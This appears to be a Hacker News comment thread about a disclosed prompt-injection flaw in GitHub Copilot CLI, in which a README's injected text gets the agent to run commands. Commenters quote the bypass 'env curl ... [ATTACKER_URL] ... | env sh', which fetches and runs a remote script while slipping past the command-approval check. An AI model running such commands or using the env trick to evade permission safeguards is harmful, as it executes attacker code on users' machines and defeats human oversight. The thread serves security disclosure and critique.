This isn't a novel technical vulnerability write up.
The author had copilot read a "prompt injection" inside a readme while copilot is enabled to execute code or run bash commands (which user had to explicitly agree to).
I highly suspect this account is astro-turfing for the site too... look at their sidebar:
``` Claude Cowork Exfiltrates Files
HN #1
Superhuman AI Exfiltrates Emails
HN #12
IBM AI ('Bob') Downloads and Executes Malware
HN #1
Notion AI: Data Exfiltration
HN #4
HuggingFace Chat Exfiltrates Data
Screen takeover attack in vLex (legal AI acquired for $1B)
Google Antigravity Exfiltrates Data
HN #1
CellShock: Claude AI is Excel-lent at Stealing Data
Hijacking Claude Code via Injected Marketplace Plugins
Data Exfiltration from Slack AI via Indirect Prompt Injection
HN #1
Data Exfiltration from Writer.com via Indirect Prompt Injection
HN #5 ```
This is precisely why tools such as Copilot CLI, Claude Code, OpenCode, etc. are best used within a VM or a rootless Podman container.
> The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.
Wait, what? Sure, you can use "env" like "printenv", to display the environment, but surely its most common use is to run other commands, making its inclusion on this list an odd choice, to say the least.
Here is a malicious command that bypasses the shell command detection mechanisms:
$ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
does everyone really need their own coding agent CLI? i feel like companies are skipping security to push out these tools
Skip to here:
> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
> env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
So GH Copilot restricts curl, but not if it's run with `env` prepended.